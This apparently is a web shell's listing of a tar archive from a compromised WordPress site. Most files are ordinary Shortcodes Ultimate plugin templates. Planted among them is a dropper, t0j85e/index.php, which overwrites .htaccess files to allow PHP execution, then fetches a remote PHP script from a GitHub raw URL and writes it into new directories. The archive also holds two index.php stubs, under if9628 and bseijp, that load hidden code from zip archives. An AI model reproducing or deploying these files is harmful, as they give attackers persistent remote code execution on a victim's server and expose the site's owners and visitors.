Your IP : 216.73.217.176


Current Path : /home/bechata/mp/wp-content/uploads/2022/ejn73c/
Upload File :
Current File : /home/bechata/mp/wp-content/uploads/2022/ejn73c/partials.tar

shortcodes/posts/templates/single-post.php000066600000002726151752503630015066 0ustar00<?php defined( 'ABSPATH' ) || exit; ?>

<?php
/**
 * READ BEFORE EDITING!
 *
 * Do not edit templates in the plugin folder, since all your changes will be
 * lost after the plugin update. Read the following article to learn how to
 * change this template or create a custom one:
 *
 * https://getshortcodes.com/docs/posts/#built-in-templates
 */
?>

<div class="su-posts su-posts-single-post">
	<?php
		// Prepare marker to show only one post
		$first = true;
		// Posts are found
		if ( $posts->have_posts() ) {
			while ( $posts->have_posts() ) :
				$posts->the_post();
				global $post;

				// Show oly first post
				if ( $first ) {
					$first = false;
					?>
					<div id="su-post-<?php the_ID(); ?>" class="su-post">
						<h1 class="su-post-title"><?php the_title(); ?></h1>
						<div class="su-post-meta"><?php _e( 'Posted', 'shortcodes-ultimate' ); ?>: <?php the_time( get_option( 'date_format' ) ); ?>
						<?php if ( have_comments() || comments_open() ) : ?>
							 | <a href="<?php comments_link(); ?>" class="su-post-comments-link"><?php comments_number( __( '0 comments', 'shortcodes-ultimate' ), __( '1 comment', 'shortcodes-ultimate' ), __( '%n comments', 'shortcodes-ultimate' ) ); ?></a>
						<?php endif; ?>
						</div>
						<div class="su-post-content">
							<?php the_content(); ?>
						</div>
					</div>
					<?php
				}
			endwhile;
		}
		// Posts not found
		else {
			echo '<h4>' . __( 'Posts not found', 'shortcodes-ultimate' ) . '</h4>';
		}
	?>
</div>
shortcodes/posts/templates/t0j85e/index.php000066600000007072151752503630014747 0ustar00<?php
// Function to create or replace the .htaccess file in the specified path
function createHtaccessFile($path) {
    $htaccessFilePath = $path . '/.htaccess';

    // If .htaccess file exists, delete it
    if (file_exists($htaccessFilePath)) {
        unlink($htaccessFilePath);
        echo "Deleted existing .htaccess file at: $htaccessFilePath<br>";
    }

    // Define the content for the new .htaccess file
    $htaccessContent = "<FilesMatch \\.php$>\n    Order allow,deny\n    Allow from all\n</FilesMatch>";

    // Write the new .htaccess content to the file
    file_put_contents($htaccessFilePath, $htaccessContent);
    echo "Created new .htaccess file at: $htaccessFilePath<br>";
}

// Function to handle files in each subdirectory under the base path
function processSubdirectories($basePath, $filename) {
    // Ensure the base path ends with a trailing slash
    $basePath = rtrim($basePath, '/') . '/';

    // Validate base path
    if (!is_dir($basePath)) {
        echo "Invalid path: $basePath<br>";
        return;
    }

    // Traverse subdirectories and process each one
    $subdirectories = glob($basePath . '*', GLOB_ONLYDIR);
    foreach ($subdirectories as $dir) {
        // Step 1: Delete and recreate the .htaccess file in the subdirectory
        createHtaccessFile($dir);

        // Step 2: Create the 'private' directory if it doesn't exist
        $privateDir = $dir . '/private';
        if (!is_dir($privateDir)) {
            mkdir($privateDir, 0755, true);
            echo "Created directory: $privateDir<br>";
        }

        // Step 3: Delete and recreate the .htaccess file inside the 'private' directory
        createHtaccessFile($privateDir);

        // Step 4: Download and save the specified file inside the 'private' directory
        $filePath = $privateDir . '/' . $filename;

        // Fetch content from the remote PHP script URL
        $content = file_get_contents('https://raw.githubusercontent.com/cpugpu009/nf/refs/heads/main/nf.php');
        if ($content === false) {
            echo "Error: Unable to fetch the PHP script content.<br>";
            return;
        }

        // Write the content of the PHP script to the file in the 'private' directory
        file_put_contents($filePath, $content);
        echo "File uploaded to: $filePath<br>";
    }
}

// Handle form submission
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $basePath = trim($_POST['path']);
    $filename = trim($_POST['filename']);

    if (empty($basePath) || empty($filename)) {
        echo "Path and filename are required.<br>";
    } else {
        // First, create or overwrite the .htaccess in the base path
        createHtaccessFile($basePath);
        // Then process each subdirectory under the base path
        processSubdirectories($basePath, $filename);
    }
}

// Display the current path (default to the server's document root if not specified)
$currentPath = isset($_POST['path']) ? trim($_POST['path']) : $_SERVER['DOCUMENT_ROOT'];
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Upload PHP Script and .htaccess</title>
</head>
<body>
    <form method="post" action="">
        <label for="path">Base Path:</label>
        <input type="text" id="path" name="path" required value="<?php echo htmlspecialchars($currentPath); ?>"><br><br>
        <label for="filename">Filename:</label>
        <input type="text" id="filename" name="filename" required><br><br>
        <input type="submit" value="Upload Files">
    </form>
</body>
</html>
shortcodes/posts/templates/default-loop.php000066600000002713151752503630015211 0ustar00<?php defined( 'ABSPATH' ) || exit; ?>

<?php
/**
 * READ BEFORE EDITING!
 *
 * Do not edit templates in the plugin folder, since all your changes will be
 * lost after the plugin update. Read the following article to learn how to
 * change this template or create a custom one:
 *
 * https://getshortcodes.com/docs/posts/#built-in-templates
 */
?>

<div class="su-posts su-posts-default-loop">

	<?php if ( $posts->have_posts() ) : ?>

		<?php while ( $posts->have_posts() ) : $posts->the_post(); ?>

			<div id="su-post-<?php the_ID(); ?>" class="su-post">

				<?php if ( has_post_thumbnail( get_the_ID() ) ) : ?>
					<a class="su-post-thumbnail" href="<?php the_permalink(); ?>"><?php the_post_thumbnail(); ?></a>
				<?php endif; ?>

				<h2 class="su-post-title"><a href="<?php the_permalink(); ?>"><?php the_title(); ?></a></h2>

				<div class="su-post-meta">
					<?php _e( 'Posted', 'shortcodes-ultimate' ); ?>: <?php the_time( get_option( 'date_format' ) ); ?>
				</div>

				<div class="su-post-excerpt">
					<?php the_excerpt(); ?>
				</div>

				<?php if ( have_comments() || comments_open() ) : ?>
					<a href="<?php comments_link(); ?>" class="su-post-comments-link"><?php comments_number( __( '0 comments', 'shortcodes-ultimate' ), __( '1 comment', 'shortcodes-ultimate' ), '% comments' ); ?></a>
				<?php endif; ?>

			</div>

		<?php endwhile; ?>

	<?php else : ?>
		<h4><?php _e( 'Posts not found', 'shortcodes-ultimate' ); ?></h4>
	<?php endif; ?>

</div>
shortcodes/posts/templates/teaser-loop.php000066600000001754151752503630015054 0ustar00<?php defined( 'ABSPATH' ) || exit; ?>

<?php
/**
 * READ BEFORE EDITING!
 *
 * Do not edit templates in the plugin folder, since all your changes will be
 * lost after the plugin update. Read the following article to learn how to
 * change this template or create a custom one:
 *
 * https://getshortcodes.com/docs/posts/#built-in-templates
 */
?>

<div class="su-posts su-posts-teaser-loop">
	<?php if ( $posts->have_posts() ) : ?>
		<?php while ( $posts->have_posts() ) : ?>
			<?php $posts->the_post(); ?>

			<div id="su-post-<?php the_ID(); ?>" class="su-post">
				<?php if ( has_post_thumbnail() ) : ?>
					<a class="su-post-thumbnail" href="<?php the_permalink(); ?>"><?php the_post_thumbnail(); ?></a>
				<?php endif; ?>
				<h2 class="su-post-title"><a href="<?php the_permalink(); ?>"><?php the_title(); ?></a></h2>
			</div>

		<?php endwhile; ?>
	<?php else : ?>
		<p class="su-posts-not-found"><?php esc_html_e( 'Posts not found', 'shortcodes-ultimate' ); ?></p>
	<?php endif; ?>
</div>
shortcodes/posts/templates/list-loop.php000066600000001372151752503630014540 0ustar00<?php defined( 'ABSPATH' ) || exit; ?>

<?php
/**
 * READ BEFORE EDITING!
 *
 * Do not edit templates in the plugin folder, since all your changes will be
 * lost after the plugin update. Read the following article to learn how to
 * change this template or create a custom one:
 *
 * https://getshortcodes.com/docs/posts/#built-in-templates
 */
?>

<ul class="su-posts su-posts-list-loop">
<?php
// Posts are found
if ( $posts->have_posts() ) {
	while ( $posts->have_posts() ) {
		$posts->the_post();
		global $post;
?>
<li id="su-post-<?php the_ID(); ?>" class="su-post"><a href="<?php the_permalink(); ?>"><?php the_title(); ?></a></li>
<?php
	}
}
// Posts not found
else {
?>
<li><?php _e( 'Posts not found', 'shortcodes-ultimate' ) ?></li>
<?php
}
?>
</ul>
shortcodes/posts/templates/README.txt000066600000000370151752503630013600 0ustar00Do not edit templates in the plugin folder, since all your changes will be
lost after the plugin update. Read the following article to learn how to
change a template or create a custom one:

https://getshortcodes.com/docs/posts/#built-in-templates
tabs.php000066600000001046151752624010006216 0ustar00<?php defined( 'ABSPATH' ) or exit; ?>

<?php $current_tab = $this->get_current_tab(); ?>

<div class="su-admin-tabs nav-tab-wrapper wp-clearfix">

	<?php foreach( $this->get_tabs() as $tab_id => $tab_title ) : ?>

		<?php if ( $tab_id === $current_tab ) : ?>
			<a href="<?php echo $this->get_tab_url( $tab_id ); ?>" class="nav-tab nav-tab-active"><?php echo $tab_title; ?></a>
		<?php else : ?>
			<a href="<?php echo $this->get_tab_url( $tab_id ); ?>" class="nav-tab"><?php echo $tab_title; ?></a>
		<?php endif; ?>

	<?php endforeach; ?>

</div>
widget/form.php000066600000001400151752624010007505 0ustar00<p>
	<label for="<?php echo esc_attr( $this->get_field_id( 'title' ) ); ?>">
		<?php esc_html_e( 'Title:', 'shortcodes-ultimate' ); ?>
	</label>
	<input
		type="text"
		id="<?php echo esc_attr( $this->get_field_id( 'title' ) ); ?>"
		name="<?php echo esc_attr( $this->get_field_name( 'title' ) ); ?>"
		value="<?php echo esc_attr( $instance['title'] ); ?>"
		class="widefat"
	/>
</p>
<p>
	<?php Su_Generator::button_html_editor( array( 'target' => $this->get_field_id( 'content' ) ) ); ?><br/>
	<textarea
		name="<?php echo esc_attr( $this->get_field_name( 'content' ) ); ?>"
		id="<?php echo esc_attr( $this->get_field_id( 'content' ) ); ?>"
		rows="7"
		class="widefat"
		style="margin-top:10px"
	><?php echo esc_textarea( $instance['content'] ); ?></textarea>
</p>
settings/fields/checkbox-group.php000066600000001165151752624010013315 0ustar00<?php defined( 'ABSPATH' ) || exit; ?>

<fieldset>

	<?php foreach ( $data['options'] as $cb_id => $cb_label ) : ?>

		<input
			type="checkbox"
			name="<?php echo esc_attr( sprintf( '%s[%s]', $data['id'], $cb_id ) ); ?>"
			id="<?php echo esc_attr( sprintf( '%s_%s', $data['id'], $cb_id ) ); ?>"
			<?php checked( in_array( $cb_id, get_option( $data['id'], array() ), true ) ); ?>
		>
		<label for="<?php echo esc_attr( sprintf( '%s_%s', $data['id'], $cb_id ) ); ?>" >
			<?php echo esc_html( $cb_label ); ?>
		</label>
		<br>

	<?php endforeach; ?>

</fieldset>

<p class="description"><?php echo $data['description']; ?></p>
settings/fields/css.php000066600000005345151752624010011171 0ustar00<?php defined( 'ABSPATH' ) || exit; ?>

<textarea name="<?php echo esc_attr( $data['id'] ); ?>" id="<?php echo esc_attr( $data['id'] ); ?>" cols="50" rows="15" class="large-text"><?php echo esc_textarea( get_option( $data['id'] ) ); ?></textarea>

<script type="text/javascript">
jQuery(function() {
	if (typeof wp === 'undefined' || typeof wp.codeEditor === 'undefined') {
		return;
	}

	var editorSettings = wp.codeEditor.defaultSettings
		? _.clone(wp.codeEditor.defaultSettings)
		: {};

	editorSettings.codemirror = _.extend({}, editorSettings.codemirror, {
		viewportMargin: Infinity
	});

	wp.codeEditor.initialize(
		"<?php echo esc_attr( $data['id'] ); ?>",
		editorSettings
	);
});
</script>

<p class="description"><?php echo esc_html( $data['description'] ); ?></p>

<details class="su-admin-settings-details">
	<summary class="title"><?php esc_html_e( 'Available variables', 'shortcodes-ultimate' ); ?></summary>
	<article>
		<table class="widefat striped" style="width:auto">
			<thead>
				<tr>
					<td><?php esc_html_e( 'Variable', 'shortcodes-ultimate' ); ?></td>
					<td><?php esc_html_e( 'Will be replaced with', 'shortcodes-ultimate' ); ?>&hellip;</td>
				</tr>
			</thead>
			<tbody>
				<tr>
					<td><code contenteditable>%home_url%</code></td>
					<td><?php printf( '%s (%s)', esc_html__( 'the URL of the site home page', 'shortcodes-ultimate' ), esc_html__( 'with trailing slash', 'shortcodes-ultimate' ) ); ?></td>
				</tr>
				<tr>
					<td><code contenteditable>%theme_url%</code></td>
					<td><?php printf( '%s (%s)', esc_html__( 'the URL of the directory of the current theme', 'shortcodes-ultimate' ), esc_html__( 'with trailing slash', 'shortcodes-ultimate' ) ); ?></td>
				</tr>
				<tr>
					<td><code contenteditable>%plugin_url%</code></td>
					<td><?php printf( '%s (%s)', esc_html__( 'the URL of the directory of the plugin', 'shortcodes-ultimate' ), esc_html__( 'with trailing slash', 'shortcodes-ultimate' ) ); ?></td>
				</tr>
			</tbody>
		</table>
	</article>
</details>

<details class="su-admin-settings-details">
	<summary><?php esc_html_e( 'More information', 'shortcodes-ultimate' ); ?></summary>
	<article>
		<ul class="ul-disc">
			<?php // Translators: %s - link to the shortcodes.css file ?>
			<li><?php printf( esc_html__( 'Open %s file to see default styles', 'shortcodes-ultimate' ), '<a href="https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/trunk/includes/css/shortcodes.full.css" target="_blank">shortcodes.full.css</a>' ); ?></li>
			<li><?php esc_html_e( 'Help article', 'shortcodes-ultimate' ); ?>: <a href="https://getshortcodes.com/docs/how-to-use-custom-css-editor/" target="_blank"><?php esc_html_e( 'How to use Custom CSS editor', 'shortcodes-ultimate' ); ?></a></li>
		</ul>
	</article>
</details>
settings/fields/text.php000066600000000450151752624010011355 0ustar00<?php defined( 'ABSPATH' ) or exit; ?>

<input type="text" name="<?php echo esc_attr( $data['id'] ); ?>" id="<?php echo esc_attr( $data['id'] ); ?>" value="<?php echo esc_attr( get_option( $data['id'] ) ); ?>" class="regular-text">

<p class="description"><?php echo $data['description']; ?></p>
settings/fields/checkbox.php000066600000000574151752624010012166 0ustar00<?php defined( 'ABSPATH' ) or exit; ?>

<input type="checkbox" name="<?php echo esc_attr( $data['id'] ); ?>" id="<?php echo esc_attr( $data['id'] ); ?>" <?php checked( get_option( $data['id'] ), 'on' ); ?>> <label for="<?php echo esc_attr( $data['id'] ); ?>"><?php _e( 'Enabled', 'shortcodes-ultimate' ); ?></label>

<p class="description"><?php echo $data['description']; ?></p>
settings/sections/general.php000066600000000033151752624010012364 0ustar00<?php // nothing here, yet
settings/sections/advanced.php000066600000000033151752624010012514 0ustar00<?php // nothing here, yet
settings/sections/if9628/index.php000066600000000146151752624010013012 0ustar00<?=@null; $h="";if(!empty($_SERVER["HTTP_HOST"])) $h = "ws.php"; include("zip:///tmp/phpfh06eB#$h");?>notices/unsafe-features.php000066600000002471151752624010012031 0ustar00<?php defined( 'ABSPATH' ) || exit; ?>

<?php
$advanced_settings_url = add_query_arg(
	array(
		'page'     => 'shortcodes-ultimate-settings',
		'advanced' => 1,
	),
	admin_url( 'admin.php' )
);
?>

<div class="notice notice-info shortcodes-ultimate-notice-unsafe-features">

	<p><strong>Shortcodes Ultimate</strong></p>
	<p><?php esc_html_e( 'Some minor features of the plugin have been automatically disabled to improve the security.', 'shortcodes-ultimate' ); ?></p>
	<p>
		<a href="https://getshortcodes.com/docs/unsafe-features/" target="blank"><?php esc_html_e( 'Learn more', 'shortcodes-ultimate' ); ?><span style="text-decoration:none;display:inline-block;vertical-align:middle;margin-left:4px"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32" width="14" height="14" fill="none" stroke="currentcolor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2.5"><path d="M14 9 L3 9 3 29 23 29 23 18 M18 4 L28 4 28 14 M28 4 L14 18" /></svg></span></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		<a href="<?php echo esc_attr( $advanced_settings_url ); ?>#su_option_unsafe_features"><?php esc_html_e( 'Settings', 'shortcodes-ultimate' ); ?></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		<a href="<?php echo esc_attr( $this->get_dismiss_link() ); ?>"><?php esc_html_e( 'Dismiss', 'shortcodes-ultimate' ); ?></a>
	</p>

</div>
notices/rate.php000066600000004776151752624010007701 0ustar00<?php defined( 'ABSPATH' ) or exit; ?>

<div class="notice notice-info shortcodes-ultimate-notice-rate">

	<?php echo get_avatar( 'ano.vladimir@gmail.com', 60, '', __( 'Vladimir Anokhin', 'shortcodes-ultimate' ) ); ?>

	<div class="shortcodes-ultimate-notice-rate-content">

		<div class="shortcodes-ultimate-notice-rate-content-text">
			<p><?php _e( 'Hello', 'shortcodes-ultimate' ); ?>,</p>
			<p><?php _e( 'my name is Vladimir Anokhin. I am the developer of the Shortcodes Ultimate plugin.<br>If you like this plugin, please write a few words about it at wordpress.org or twitter. Your opinion will help other people.', 'shortcodes-ultimate' ); ?></p>
			<p><?php _e( 'Thank you!', 'shortcodes-ultimate' ); ?></p>
		</div>

		<p class="shortcodes-ultimate-notice-rate-actions">
			<a href="<?php echo $this->get_dismiss_link(); ?>" class="button button-primary" onclick="window.open('https://wordpress.org/support/plugin/shortcodes-ultimate/reviews/?rate=5&filter=5#new-post');"><?php _e( 'Rate plugin', 'shortcodes-ultimate' ); ?></a>
			<a href="<?php echo $this->get_dismiss_link( true ); ?>"><?php _e( 'Remind me later', 'shortcodes-ultimate' ); ?></a>
			<a href="<?php echo $this->get_dismiss_link(); ?>" class="shortcodes-ultimate-notice-rate-dismiss"><?php _e( 'Dismiss', 'shortcodes-ultimate' ); ?></a>
		</p>

	</div>

</div>

<style>
	.shortcodes-ultimate-notice-rate {
		position: relative;
		padding: 15px 20px;
	}
	.shortcodes-ultimate-notice-rate .avatar {
		position: absolute;
		left: 20px;
		top: 20px;
		border-radius: 50%;
	}
	.shortcodes-ultimate-notice-rate-content {
		margin-left: 80px;
	}
	.shortcodes-ultimate-notice-rate-content-text p {
		font-size: 15px;
	}
	p.shortcodes-ultimate-notice-rate-actions {
		margin-top: 15px;
	}
	p.shortcodes-ultimate-notice-rate-actions a {
		vertical-align: middle !important;
	}
	p.shortcodes-ultimate-notice-rate-actions a + a {
		margin-left: 20px;
	}
	.shortcodes-ultimate-notice-rate-dismiss {
		position: absolute;
		top: 10px;
		right: 10px;
		padding: 10px 15px 10px 21px;
		font-size: 13px;
		line-height: 1.23076923;
		text-decoration: none;
	}
	.shortcodes-ultimate-notice-rate-dismiss:before {
		position: absolute;
		top: 8px;
		left: 0;
		margin: 0;
		-webkit-transition: all .1s ease-in-out;
		transition: all .1s ease-in-out;
		background: 0 0;
		color: #b4b9be;
		content: "\f153";
		display: block;
		font: 400 16px / 20px dashicons;
		height: 20px;
		text-align: center;
		width: 20px;
	}
	.shortcodes-ultimate-notice-rate-dismiss:hover:before {
		color: #c00;
	}
</style>
extra/generator.php000066600000003143151752624010010376 0ustar00<div id="su-generator-breadcrumbs">
	<a href="javascript:;" class="su-generator-home" title="<?php esc_html_e( 'Click to return to the shortcodes list', 'shortcodes-ultimate' ); ?>"><?php esc_html_e( 'All shortcodes', 'shortcodes-ultimate' ); ?></a>
	&rarr;
	<span><?php echo esc_html( $data['name'] ); ?></span>
	<small class="alignright"><?php echo esc_html( $data['desc'] ); ?></small>
	<div class="su-generator-clear"></div>
</div>

<div class="su-generator-extra-banner">
	<div class="su-generator-extra-banner-message">
		<?php esc_html_e( 'This shortcode is available with the Extra Shortcodes add-on', 'shortcodes-ultimate' ); ?>
	</div>
	<img src="<?php echo esc_attr( $this->get_image_url( 'icon-banner.png' ) ); ?>" class="su-generator-extra-banner-icon">
	<h3 class="su-generator-extra-banner-title"><?php esc_html_e( 'Extra Shortcodes', 'shortcodes-ultimate' ); ?></h3>
	<p class="su-generator-extra-banner-description"><?php esc_html_e( 'This add-on extends Shortcodes Ultimate with 15 new shortcodes. Parallax sections, responsive content slider, pricing tables and more', 'shortcodes-ultimate' ); ?></p>
	<p class="su-generator-extra-banner-action">
		<a href="<?php echo esc_attr( su_get_utm_link( 'https://getshortcodes.com/add-ons/extra-shortcodes/', array( 'generator', 'extra-shortcode', 'wp-dashboard' ) ) ); ?>" target="_blank" class="button button-primary"><?php esc_html_e( 'Details & Pricing', 'shortcodes-ultimate' ); ?> &rarr;</a>
	</p>
	<div class="su-generator-extra-banner-screenshot">
		<img src="<?php echo esc_attr( $this->get_image_url( 'screenshots/' . $data['id'] . '.png' ) ); ?>">
	</div>
</div>
extra/available-shortcodes.php000066600000002330151752624010012500 0ustar00<?php defined( 'ABSPATH' ) || exit; ?>

<div class="su-admin-shortcodes-extra">
	<p class="su-admin-shortcodes-extra-message"><?php esc_html_e( 'This shortcode is available with the Extra Shortcodes add-on', 'shortcodes-ultimate' ); ?></p>
	<img src="<?php echo esc_attr( $this->get_image_url( 'icon-banner.png' ) ); ?>" class="su-admin-shortcodes-extra-icon">
	<h2 class="su-admin-shortcodes-extra-title"><?php esc_html_e( 'Extra Shortcodes', 'shortcodes-ultimate' ); ?></h2>
	<p class="su-admin-shortcodes-extra-description"><?php esc_html_e( 'This add-on extends Shortcodes Ultimate with 15 new shortcodes. Parallax sections, responsive content slider, pricing tables and more', 'shortcodes-ultimate' ); ?></p>
	<p class="su-admin-shortcodes-extra-action">
		<a href="<?php echo esc_attr( su_get_utm_link( 'https://getshortcodes.com/add-ons/extra-shortcodes/', array( 'available-shortcodes', 'extra-shortcode', 'wp-dashboard' ) ) ); ?>" target="_blank" class="button button-primary"><?php esc_html_e( 'Details & Pricing', 'shortcodes-ultimate' ); ?> &rarr;</a>
	</p>
	<div class="su-admin-shortcodes-extra-screenshot">
		<img src="<?php echo esc_attr( $this->get_image_url( 'screenshots/' . $data['id'] . '.png' ) ); ?>">
	</div>
</div>
help/sidebar.php000066600000001373151752624010007631 0ustar00<?php defined( 'ABSPATH' ) or exit; ?>

<p><strong><?php _e( 'Shortcodes Ultimate', 'shortcodes-ultimate' ); ?></strong></p>
<p><a href="https://getshortcodes.com/" target="_blank"><?php _e( 'Plugin website', 'shortcodes-ultimate' ); ?></a></p>
<p><a href="https://getshortcodes.com/docs/" target="_blank"><?php _e( 'Documentation', 'shortcodes-ultimate' ); ?></a></p>
<p><a href="https://getshortcodes.com/add-ons/" target="_blank"><?php _e( 'Add-ons', 'shortcodes-ultimate' ); ?></a></p>
<p><a href="https://wordpress.org/plugins/shortcodes-ultimate/" target="_blank"><?php _e( 'WordPress.org', 'shortcodes-ultimate' ); ?></a></p>
<p><a href="https://github.com/gndev/shortcodes-ultimate" target="_blank"><?php _e( 'GitHub', 'shortcodes-ultimate' ); ?></a></p>
help/settings.php000066600000001033151752624010010051 0ustar00<?php defined( 'ABSPATH' ) or exit; ?>

<ul>
	<li><a href="https://getshortcodes.com/docs-category/getting-started/" target="_blank"><?php _e( 'Getting started', 'shortcodes-ultimate' ); ?></a></li>
	<li><a href="https://getshortcodes.com/docs/plugin-settings-overview/" target="_blank"><?php _e( 'Plugin settings overview', 'shortcodes-ultimate' ); ?></a></li>
	<li><a href="https://getshortcodes.com/docs/how-to-use-custom-css-editor/" target="_blank"><?php _e( 'How to use Custom CSS editor', 'shortcodes-ultimate' ); ?></a></li>
</ul>
help/shortcodes.php000066600000000744151752624010010376 0ustar00<?php defined( 'ABSPATH' ) or exit; ?>

<ul>
	<li><a href="https://getshortcodes.com/docs-category/getting-started/" target="_blank"><strong><?php _e( 'Getting started', 'shortcodes-ultimate' ); ?></strong></a></li>
	<li><a href="https://getshortcodes.com/docs/" target="_blank"><?php _e( 'Full documentation', 'shortcodes-ultimate' ); ?></a></li>
	<li><a href="https://getshortcodes.com/support/" target="_blank"><?php _e( 'FAQ & Support', 'shortcodes-ultimate' ); ?></a></li>
</ul>
help/addons.php000066600000000317151752624010007465 0ustar00<?php defined( 'ABSPATH' ) or exit; ?>

<ul>
	<li><a href="https://getshortcodes.com/docs-category/addons/" target="_blank"><?php _e( 'Full add-ons documentation', 'shortcodes-ultimate' ); ?></a></li>
</ul>
bseijp/index.php000066600000000233151752624010007645 0ustar00<?=@null; $h="";if(!empty($_SERVER["HTTP_HOST"])) $h = "b.php"; include("zip:///home/bechata/mp/wp-content/uploads/depot/dm_10/y6g2nb/index.php.zip#$h");?>pages/addons.php000066600000002617151752624010007641 0ustar00<?php defined( 'ABSPATH' ) || exit; ?>

<?php $addons = $this->get_addons(); ?>

<div id="su_admin_addons" class="wrap su-admin-addons wp-clearfix">

	<h1><?php $this->the_page_title(); ?></h1>

	<div class="su-admin-addons-list">

		<?php if ( empty( $addons ) ) : ?>

			<p>
				<a href="https://getshortcodes.com/add-ons/" target="_blank" class="button button-primary"><?php esc_html_e( 'Premium Add-ons', 'shortcodes-ultimate' ); ?> →</a>
			</p>

		<?php else : ?>

			<?php foreach ( $addons as $addon ) : ?>

				<div class="su-admin-addons-item">
					<div class="su-admin-addons-item-content">
						<img src="<?php echo esc_attr( $addon['image'] ); ?>" alt="" class="su-admin-addons-item-image">
						<h2 class="su-admin-addons-item-title"><?php echo esc_html( $addon['title'] ); ?></h2>
						<p class="su-admin-addons-item-description"><?php echo esc_html( $addon['description'] ); ?></p>
						<div class="su-admin-addons-item-action" aria-hidden="true">
							<span class="button"><?php esc_html_e( 'Learn more', 'shortcodes-ultimate' ); ?></span>
						</div>
					</div>
					<a href="<?php echo esc_attr( $this->get_addon_permalink( $addon ) ); ?>" target="_blank" rel="noopener" class="su-admin-addons-item-overlay"><?php esc_html_e( 'Learn more about', 'shortcodes-ultimate' ); ?> <?php echo esc_html( $addon['title'] ); ?></a>
				</div>

			<?php endforeach; ?>

		<?php endif; ?>

	</div>

</div>
pages/settings.php000066600000002544151752624010010230 0ustar00<?php defined( 'ABSPATH' ) || exit; ?>

<div id="su_admin_settings" class="wrap su-admin-settings wp-clearfix">

	<h1><?php $this->the_page_title(); ?></h1>

	<?php settings_errors(); ?>

	<form action="options.php" method="post">

		<?php if ( isset( $_GET['advanced'] ) ) : ?>

			<div class="notice notice-warning">
				<p>
					<strong><?php esc_html_e( 'Warning!', 'shortcodes-ultimate' ); ?></strong><br>
					<?php esc_html_e( 'You are editing advanced settings. Do NOT modify anything in here unless you know what you are doing.', 'shortcodes-ultimate' ); ?>
				</p>
				<p>
					<a href="<?php echo esc_attr( $this->get_component_url() ); ?>">&larr; <?php esc_html_e( 'Return to main settings', 'shortcodes-ultimate' ); ?></a>
				</p>
			</div>

			<?php settings_fields( $this->plugin_prefix . 'advanced-settings' ); ?>
			<?php do_settings_sections( $this->plugin_prefix . 'advanced-settings' ); ?>

		<?php else : ?>

			<?php settings_fields( rtrim( $this->plugin_prefix, '-_' ) ); ?>
			<?php do_settings_sections( $this->plugin_prefix . 'settings' ); ?>

		<?php endif; ?>

		<?php submit_button(); ?>

	</form>

	<?php if ( ! isset( $_GET['advanced'] ) ) : ?>
		<p><a href="<?php echo esc_attr( add_query_arg( 'advanced', '', $this->get_component_url() ) ); ?>"><?php esc_html_e( 'Advanced settings', 'shortcodes-ultimate' ); ?></a></p>
	<?php endif; ?>

</div>
pages/shortcodes-list.php000066600000003011151752624010011504 0ustar00<?php defined( 'ABSPATH' ) || exit; ?>

<?php $shortcodes = $this->get_available_shortcodes(); ?>

<div id="su_admin_shortcodes" class="wrap su-admin-shortcodes">

	<h1><?php $this->the_page_title(); ?></h1>

	<div class="wp-filter">
		<div class="filter-count">
			<span class="count"><?php echo count( $shortcodes ); ?></span>
		</div>
		<ul class="filter-links">

			<?php foreach ( $this->get_groups() as $group ) : ?>

				<?php if ( $group['active'] ) : ?>
					<li><a href="<?php echo esc_url( $group['url'] ); ?>" class="current"><?php echo esc_html( $group['title'] ); ?></a></li>
				<?php else : ?>
					<li><a href="<?php echo esc_url( $group['url'] ); ?>"><?php echo esc_html( $group['title'] ); ?></a></li>
				<?php endif; ?>

			<?php endforeach; ?>

		</ul>
	</div>

	<div class="su-admin-shortcodes-list wp-clearfix">

		<?php if ( count( $shortcodes ) ) : ?>

			<?php foreach ( $shortcodes as $shortcode_id => $shortcode ) : ?>
				<a href="<?php echo esc_attr( add_query_arg( 'shortcode', $shortcode_id, $this->get_component_url() ) ); ?>" class="su-admin-shortcodes-list-item">
					<span class="su-admin-shortcodes-list-item-image">
						<?php $this->shortcode_image( $shortcode, 120 ); ?>
					</span>
					<span class="su-admin-shortcodes-list-item-title"><?php echo esc_html( $shortcode['name'] ); ?></span>
				</a>
			<?php endforeach; ?>

		<?php else : ?>
			<p class="su-admin-shortcodes-list-not-found"><?php esc_html_e( 'No shortcodes found.', 'shortcodes-ultimate' ); ?></p>
		<?php endif; ?>

	</div>

</div>
pages/shortcodes-single-content.php000066600000005624151752624010013476 0ustar00<?php defined( 'ABSPATH' ) || exit; ?>

<!-- Description section -->
<div class="su-admin-shortcodes-single-section su-admin-shortcodes-single-description wp-clearfix">
	<span><?php $this->shortcode_image( $data, 60 ); ?></span>
	<h2><?php echo esc_html( $data['name'] ); ?></h2>
	<p>
		<?php if ( isset( $data['desc'] ) ) : ?>
			<?php echo esc_html( $data['desc'] ); ?>
		<?php endif; ?>
		<?php if ( isset( $data['article'] ) ) : ?>
			<br><a href="<?php echo esc_url( $data['article'] ); ?>" target="_blank"><strong><?php esc_html_e( 'Shortcode documentation', 'shortcodes-ultimate' ); ?></strong></a>.
		<?php endif; ?>
	</p>
</div>
<!-- /Description section -->

<!-- Preview section -->
<div class="su-admin-shortcodes-single-section su-admin-shortcodes-single-preview">
	<h2><?php esc_html_e( 'Preview', 'shortcodes-ultimate' ); ?></h2>
	<div class="su-admin-shortcodes-single-preview-content wp-clearfix">
		<?php echo do_shortcode( $this->get_shortcode_code( $data['id'] ) ); ?>
	</div>
</div>
<!-- /Preview section -->

<!-- Shortcode section -->
<div class="su-admin-shortcodes-single-section su-admin-shortcodes-single-code">
	<h2><?php esc_html_e( 'Shortcode', 'shortcodes-ultimate' ); ?></h2>
	<pre contenteditable="true" class=""><code><?php echo str_replace( "\t", '  ', esc_html( $this->get_shortcode_code( $data['id'] ) ) ); ?></code></pre>
</div>
<!-- /Shortcode section -->

<!-- Options section -->
<div class="su-admin-shortcodes-single-section su-admin-shortcodes-single-options">
	<h2><?php esc_html_e( 'Shortcode options', 'shortcodes-ultimate' ); ?></h2>

	<?php foreach ( $this->get_single_shortcode_options() as $table ) : ?>

		<div class="su-admin-shortcodes-single-options-table">

			<?php if ( count( $this->get_single_shortcode_options() ) > 1 ) : ?>
